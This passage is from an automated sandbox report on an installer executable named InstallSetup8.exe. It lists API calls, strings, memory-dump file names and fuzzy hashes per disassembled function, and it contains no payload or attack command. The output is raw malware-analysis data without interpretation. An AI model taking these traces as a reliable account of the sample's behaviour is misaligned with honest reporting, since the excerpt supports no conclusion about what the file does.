Part of subcall function 0040649E: wsprintfW.USER32 ref: 004064AB

lstrcatW.KERNEL32(1033,0042CA68), ref: 00403CAA
lstrlenW.KERNEL32(004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000,00000002,74DF3420), ref: 00403D2A
lstrcmpiW.KERNEL32(00432698,.exe,004326A0,?,?,?,004326A0,00000000,0043F800,1033,0042CA68,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042CA68,00000000), ref: 00403D3D
GetFileAttributesW.KERNEL32(004326A0), ref: 00403D48
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,0043F800), ref: 00403D91
RegisterClassW.USER32(004336A0), ref: 00403DCE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DE6
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403E1B
ShowWindow.USER32(00000005,00000000), ref: 00403E51
GetClassInfoW.USER32(00000000,RichEdit20W,004336A0), ref: 00403E7D
GetClassInfoW.USER32(00000000,RichEdit,004336A0), ref: 00403E8A
RegisterClassW.USER32(004336A0), ref: 00403E93
DialogBoxParamW.USER32(?,00000000,00403FD7,00000000), ref: 00403EB2

Strings

RichEd32, xrefs: 00403E65
Control Panel\Desktop\ResourceLocale, xrefs: 00403C5D
.DEFAULT\Control Panel\International, xrefs: 00403C95
.exe, xrefs: 00403D37
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2E
_Nb, xrefs: 00403DAD, 00403E15
RichEdit20W, xrefs: 00403E75, 00403E7B
1033, xrefs: 00403C49, 00403CA5
RichEd20, xrefs: 00403E57
RichEdit, xrefs: 00403E84

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 606308-236412282
Opcode ID: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
Instruction ID: b78af383561608ccb802af496d710159af2d94eef556b4765221653e5b422f1b
Opcode Fuzzy Hash: 668670e2436d8560ce7a95db19fe7fb6d2e11ba6b6241f5eb901d3d615c3ba1a
Instruction Fuzzy Hash: 9F61C270100640BED220AF66ED46F2B3A6CEB85B5AF50013FF945B62E2DB7C59418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403082 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403093
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,00000400), ref: 004030AF

Part of subcall function 00406047: GetFileAttributesW.KERNEL32(00000003,004030C2,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,80000000,00000003), ref: 0040604B
Part of subcall function 00406047: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D

GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,C:\Users\user\AppData\Local\Temp\InstallSetup8.exe,80000000,00000003), ref: 004030FB
GlobalAlloc.KERNEL32(00000040,?), ref: 00403231

Strings

C:\Users\user\AppData\Local\Temp\InstallSetup8.exe, xrefs: 00403099, 004030A8, 004030BC, 004030DC
Inst, xrefs: 00403167
Error launching installer, xrefs: 004030D2
C:\Users\user\AppData\Local\Temp\, xrefs: 00403089
soft, xrefs: 00403170
C:\Users\user\AppData\Local\Temp, xrefs: 004030DD, 004030E2, 004030E8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403258
Null, xrefs: 00403179

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\InstallSetup8.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-540114609
Opcode ID: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction ID: 68b8bf8592918c5e7f10339d86c9767fe938295b8d0ed8def850c2c8f1d184f5
Opcode Fuzzy Hash: 4024c06592b314d40f0961ad518ac7c722ea73bb9c6d843fd25d11ff0f4bc292
Instruction Fuzzy Hash: 8251A071A00204ABDB20AF65DD85B9E7EACEB49356F10417BF900B62D1C77C9F408BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00401774 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B5
CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe,C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe,00000000,00000000,C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017DA

Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

Strings

C:\Users\user\AppData\Local\Temp\nsu43C0.tmp, xrefs: 00401826, 00401844
C:\Users\user\AppData\Local\Temp\nsu43C0.tmp\INetC.dll, xrefs: 0040183A, 00401856
C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe, xrefs: 00401792, 0040179B, 004017A8, 004017BA, 004017C6, 004017FC, 00401812, 00401830, 0040186C, 004018ED, 004018F6, 00401900, 0040190B
C:\Users\user\AppData\Local\Temp, xrefs: 004017A3

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe$C:\Users\user\AppData\Local\Temp\nsu43C0.tmp$C:\Users\user\AppData\Local\Temp\nsu43C0.tmp\INetC.dll
API String ID: 1941528284-2700960353
Opcode ID: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction ID: f3bec3fd9c2ad120a03a9c06557e7274b723a0da437845685234e4033458a62e
Opcode Fuzzy Hash: 5d94e8e5950a8b2ff13ebbfcdf8ec3f64fd71dec5ee91277c9a67e4679359a3d
Instruction Fuzzy Hash: 0B419471800108BACB11BFA5DD85DBE76B9EF45328B21423FF412B10E2DB3C8A519A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004032B9 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00403323
GetTickCount.KERNEL32 ref: 004033CA
MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004033F3
wsprintfW.USER32 ref: 00403406

Strings

A, xrefs: 00403483
*B, xrefs: 004032E4
A, xrefs: 00403379
... %d%%, xrefs: 00403400

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: *B$ A$ A$... %d%%
API String ID: 551687249-3485722521
Opcode ID: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction ID: 982be0e2f69b4341102b9ffd21d6361bbd2cc6e706b5ad6adcc0aeecd99e7a45
Opcode Fuzzy Hash: b04dab49cf37ea20022f46a8b7c81c1884779548b4bab61156e959bad0df676f
Instruction Fuzzy Hash: 1A516F71910219EBCB11CF65DA44B9E7FB8AF04756F10827BE814BB2D1C7789A40CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004026F1 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 0040275D
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402798
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027BB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027D1

Part of subcall function 00406128: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040613E

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040287D

Strings

9, xrefs: 00402740

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction ID: e892b7cb172a86a35cdf2d5061c859a119b49b65f2ae0b0c69c9b35c58dd84de
Opcode Fuzzy Hash: 6186ba75392568282b6731289b87e01334a0414050beb0dbbc28c320faadcf08
Instruction Fuzzy Hash: F151FB75D0411AABDF24DFD4CA85AAEBBB9FF04344F10817BE901B62D0D7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 004068DB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068F2
wsprintfW.USER32 ref: 0040692D
LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406941

Strings

UXTHEME, xrefs: 004068E4
%s%S.dll, xrefs: 00406927

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME
API String ID: 2200240437-1106614640
Opcode ID: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction ID: a217f45d9ff01499786c61cea798a126a457230594f844882b590dd92c6ddc53
Opcode Fuzzy Hash: 7a73cbb44207cafadb11ab8eaaa41fd963bfa172cfc882b2dd9c54e233860d96
Instruction Fuzzy Hash: 69F0F671501219A6CF14BB68DD0DF9B376CAB40304F21447AA646F20E0EB789B69CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00406076 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00406094
GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403530,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C), ref: 004060AF

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040607B
nsa, xrefs: 00406083

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-678247507
Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction ID: 86e06e500a6970b3bc5bd370241205c1b86a0a172d82c816bfbfc8c597d973d5
Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
Instruction Fuzzy Hash: 65F09076B50204FBEB10CF69ED05F9EB7ACEB95750F11803AED05F7240E6B099548768

Uniqueness

Uniqueness Score: -1.00%

Function 004015C6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405ED1: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,?,00405F45,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,C:\Users\user\AppData\Local\Temp\nsu43BF.tmp,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC

GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F

Part of subcall function 00405AAB: CreateDirectoryW.KERNEL32(00437800,?), ref: 00405AED

SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\AppData\Local\Temp,?,00000000,000000F0), ref: 00401652

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401645

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-47812868
Opcode ID: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction ID: 6fd3d265dcb44280b24f8e6f21651466162e19908bb00ba525d5af3adea1cd3c
Opcode Fuzzy Hash: 6eb1be088149721894534dc5ef05b39002eda9ec2efe8824e8f1ae211de42d0c
Instruction Fuzzy Hash: F211E231404104ABCF206FA5CD0159F36B0EF04368B25493FE945B22F1DA3D4A81DA5E

Uniqueness

Uniqueness Score: -1.00%

Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402108

Part of subcall function 004055DC: lstrlenW.KERNEL32(0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000,?), ref: 00405614
Part of subcall function 004055DC: lstrlenW.KERNEL32(0040341D,0042BA48,00000000,00428E20,74DF23A0,?,?,?,?,?,?,?,?,?,0040341D,00000000), ref: 00405624
Part of subcall function 004055DC: lstrcatW.KERNEL32(0042BA48,0040341D), ref: 00405637
Part of subcall function 004055DC: SetWindowTextW.USER32(0042BA48,0042BA48), ref: 00405649
Part of subcall function 004055DC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566F
Part of subcall function 004055DC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405689
Part of subcall function 004055DC: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405697

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402119
FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402196

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
String ID:
API String ID: 334405425-0
Opcode ID: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction ID: 3664ba2fa099400b069473e4dbd5787d756d46fb785c5e03f539e90392346bbf
Opcode Fuzzy Hash: 675ba370df0aff6a88f198f51fec383e6e490030c952a3077ac8e14d7d31a15f
Instruction Fuzzy Hash: C9219231904108BADF11AFA5CF49A9D7A71FF84358F20413FF201B91E1CBBD8982AA5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C1B Relevance: 4.5, APIs: 3, Instructions: 28
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406022: GetFileAttributesW.KERNEL32(?,?,00405C27,?,?,00000000,00405DFD,?,?,?,?), ref: 00406027
Part of subcall function 00406022: SetFileAttributesW.KERNEL32(?,00000000), ref: 0040603B

RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C36
DeleteFileW.KERNEL32(?,?,?,00000000,00405DFD), ref: 00405C3E
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405C56

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: File$Attributes$DeleteDirectoryRemove
String ID:
API String ID: 1655745494-0
Opcode ID: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction ID: 2cd832b5149a82f614695d38d41b3aba95dfe4f26efc6ce9164d7e3db346642e
Opcode Fuzzy Hash: db7f6541ced3958ca03b9484ad33d053af3f68eb31512009fba6ce163230055c
Instruction Fuzzy Hash: 9AE02B3110D7915AE32077705E0CB5F2AD8DF86324F05093AF492F10C0DB78488A8A7E

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 0000000D.00000002.3179518855.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.3179251452.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3179889284.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000042F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000431000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.000000000043A000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3180147874.0000000000440000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000D.00000002.3182111858.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_InstallSetup8.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction ID: 0adee223d2b7ba7d815a442a2885e1f2b60e3b86eb1a18037e9b6c54a102055c
Opcode Fuzzy Hash: a48e27458ca857e7bf1c95edfaa4f4fc3f64b4f364872359a8149092e2b898a4
Instruction Fuzzy Hash: 0E01FF31620220AFE7195B389E05B6B3698E710329F10863FF851F62F1EA78DC429B4C

Uniqueness

Uniqueness Score: -1.00%

Function 00405AAB Relevance: 3.0, APIs: 2, Instructions: 26
COMMON
